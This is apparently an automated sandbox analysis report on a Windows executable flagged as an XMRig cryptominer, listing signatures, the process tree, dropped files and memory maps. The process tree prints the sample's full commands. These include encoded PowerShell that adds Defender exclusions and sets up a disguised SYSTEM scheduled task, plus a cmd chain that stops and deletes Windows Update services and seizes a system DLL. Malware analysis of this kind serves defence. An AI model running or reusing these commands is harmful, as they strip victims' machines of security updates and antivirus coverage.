Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
10-11-2022 18:59
General
-
Target
file.exe
-
Size
2.5MB
-
MD5
3db308a4a293420df30a444944f2ccb6
-
SHA1
4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
-
SHA256
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
-
SHA512
a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
SSDEEP
49152:BIX8orGKWyNi/abKDNtEgSsoi/hiO0WygnaWjIe1BSORYt3m5rj4A19oo/tGIPIP:bBsi/cKRt1SsoipihWyzcbaqYpm5wA10
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 6 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAB3ACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgASQBBAGIAdwBCAGoAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAbABBAEcATQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwB0AHQAdwAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGcAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHoAYgBkAGYAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBnAGYAeQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGYAaQBsAGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB1AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwB6AGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHIAbwBjACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBlAGMAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "giyxhlnw"4⤵
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe xzdqclthzpcazp0 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaKQjZcNqd1938GRB8dGIm2jUo1P1EwqD6WsAjiwuDAWLCfR3BRzADWgpJ7CQxFR7+anCrIhDT/00bieUv+n3qzA/ZBTeGzJOEzp2ufDT4ez7i94dFOd7htQWVDfk0FvX4a+088kTIG70C+qoBp7PPo1o2A5n8KneHMS5/guyM+nQkyz5PCuPtW1otcyRyfkXuJFiqnw4xHcIav5OP5k07szbPwxOTbqWzmU88osXNGi3m9t4Gwg0G56kg7iABsHbrK5UzmJ/FgcEz0jZ/3un+gS+Rf+IWiuYLXvFLT3dhSYQEp2MbWtYrce1ynEL2g4m1i3nZh07E/ntkN3OenhsoDXadhJLavl9NK0sNtCm2olw7Es0i9g5kp1KX++H2R+p8TerO894R0g6VcrvRRJ+3FNfFJEDMYbyeu61ZEsJe2P9UVJBbbbkXTZny0JoLyKbpVAGAT9wmmSPrpsDA8G3bbPD2mzExQDUSq6vDCincR1pfndSpJ6ETOEAak8MK+m/fKPDk8iiEXOF+mvhBrtYGTnSCz2kL1bsCs/yWKCKTGO/4=4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD53db308a4a293420df30a444944f2ccb6
SHA14cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD53db308a4a293420df30a444944f2ccb6
SHA14cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
memory/392-140-0x0000000000000000-mapping.dmp
-
memory/448-153-0x0000000000000000-mapping.dmp
-
memory/492-148-0x0000000000000000-mapping.dmp
-
memory/644-154-0x0000000000000000-mapping.dmp
-
memory/764-147-0x0000000000000000-mapping.dmp
-
memory/776-157-0x0000000000000000-mapping.dmp
-
memory/1124-132-0x00000200C3FF0000-0x00000200C4240000-memory.dmpFilesize
2.3MB
-
memory/1124-161-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/1124-133-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/1152-218-0x0000000000000000-mapping.dmp
-
memory/1316-143-0x0000000000000000-mapping.dmp
-
memory/1400-171-0x0000000000000000-mapping.dmp
-
memory/1468-194-0x0000000000000000-mapping.dmp
-
memory/1572-193-0x0000000000000000-mapping.dmp
-
memory/1672-168-0x0000000000000000-mapping.dmp
-
memory/1696-183-0x00000214B7660000-0x00000214B767C000-memory.dmpFilesize
112KB
-
memory/1696-187-0x00000214B78E0000-0x00000214B78FA000-memory.dmpFilesize
104KB
-
memory/1696-182-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/1696-184-0x00000214B7450000-0x00000214B745A000-memory.dmpFilesize
40KB
-
memory/1696-185-0x00000214B78A0000-0x00000214B78BC000-memory.dmpFilesize
112KB
-
memory/1696-186-0x00000214B7880000-0x00000214B788A000-memory.dmpFilesize
40KB
-
memory/1696-191-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/1696-190-0x00000214B78D0000-0x00000214B78DA000-memory.dmpFilesize
40KB
-
memory/1696-178-0x0000000000000000-mapping.dmp
-
memory/1696-189-0x00000214B78C0000-0x00000214B78C6000-memory.dmpFilesize
24KB
-
memory/1696-188-0x00000214B7890000-0x00000214B7898000-memory.dmpFilesize
32KB
-
memory/1956-202-0x0000000000000000-mapping.dmp
-
memory/1976-220-0x0000000000000000-mapping.dmp
-
memory/2080-142-0x0000000000000000-mapping.dmp
-
memory/2292-136-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/2292-135-0x00000296B9710000-0x00000296B9732000-memory.dmpFilesize
136KB
-
memory/2292-137-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/2292-134-0x0000000000000000-mapping.dmp
-
memory/2372-204-0x0000000000000000-mapping.dmp
-
memory/2420-196-0x0000000000000000-mapping.dmp
-
memory/2436-149-0x0000000000000000-mapping.dmp
-
memory/2484-200-0x0000000000000000-mapping.dmp
-
memory/2768-174-0x0000000000000000-mapping.dmp
-
memory/2788-199-0x0000000000000000-mapping.dmp
-
memory/2860-223-0x0000000000000000-mapping.dmp
-
memory/2908-163-0x0000000000000000-mapping.dmp
-
memory/2956-170-0x0000000000000000-mapping.dmp
-
memory/2972-197-0x0000000000000000-mapping.dmp
-
memory/3008-165-0x0000000000000000-mapping.dmp
-
memory/3044-227-0x0000000000000000-mapping.dmp
-
memory/3048-150-0x0000000000000000-mapping.dmp
-
memory/3092-152-0x0000000000000000-mapping.dmp
-
memory/3144-228-0x0000000000000000-mapping.dmp
-
memory/3148-226-0x0000000000000000-mapping.dmp
-
memory/3156-195-0x0000000000000000-mapping.dmp
-
memory/3244-175-0x0000000000000000-mapping.dmp
-
memory/3252-221-0x0000000000000000-mapping.dmp
-
memory/3372-216-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
